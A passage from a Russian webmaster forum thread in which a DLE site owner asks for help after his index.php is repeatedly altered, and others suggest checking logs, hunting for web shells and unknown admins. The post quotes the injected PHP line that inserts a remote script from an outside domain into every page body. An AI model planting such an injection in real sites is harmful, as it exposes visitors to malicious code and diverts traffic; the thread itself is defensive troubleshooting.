- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Наверное, у многих, кто держит DLE появилась проблема со взломом сайта на автомате.
В index.php добавляется
echo $tpl->result['main'] = preg_replace('~(<body.*?>)~ism','$1<script src=http://promediagroup.ru/d.js></script>', $tpl->result['main']);Никак не могу нагуглить, что это за дырочка такая, и как с ней бороться. Надоело уже сливать трафик с ПС непонятно куда.
Знает кто-нибудь полезную инфу по этому вопросу?
Смотрите access лог за время изменения файла.
POST запросы не увидите, но все-таки...
Знает кто-нибудь полезную инфу по этому вопросу?
Безусловно.
Описанные прививки уже давным давно сделаны. Спасибо всё же.
Хочу сам разобраться в вопросе :)
Anarchist, модуль переходов (он же referer) установлен ?
Соседние сайты на ДЛЕ есть ? Наличие на хостинге/сервере шелов проверяли ? Наличие админов незнакомых смотрели ?
ХортицаА мудуль переходов обьязательно надо убрать с сайта?закрыл все диры,скрипт не исполняется,но самы запросы появляются в блоге...
A.H., в каком нафиг блоГе ? Как и зачем вы закрывали дИры ? Извините, но я не понимаю Ваших слов.
Anarchist, модуль переходов (он же referer) установлен ?
Нет
Соседние сайты на ДЛЕ есть ?
Виртуальный хостинг. На моем аккаунте нет, но вообще вполне могут быть на сервере. Но не думаю, что прав хватит.
Наличие на хостинге/сервере шелов проверяли ?
Да, отсутствуют.
Наличие админов незнакомых смотрели ?
Он один - это я :)
PS: поставил на файл index.php запрет на запись. Не помогло - опять выставлены 666 =\
PS: поставил на файл index.php запрет на запись. Не помогло - опять выставлены 666 =\
100% есть шел. То что Вы думаете что прав не хватит - это оочень большое заблуждение!
Вариантов куда воткнуть часть шела для запуска - множество. Я на своем опыте встречал и в файле сапы, и в engine.php и в init.php, некоторые даже инклюдили из dbconfig.php шел.
Просите суппорт чтобы искал файлы содержащие часть из фразы "WEB shell by ORB" это самый распространенный вариант использования. Или же как я Вам и писал в первом же своем сообщении всегда есть Вариант №2 ;)
Сначала я расшибусь в лепёшку, решая этот вопрос, а потом, если не получится всё равно ничего, то придётся прибегнуть к вашей помощи. Но у меня уже спортивный азарт открылся :)
Anarchist, ну тогда успехов. Мне пришлось 2ое суток напролет перерывать логи, прежде чем узнал как и откуда ломали сайты.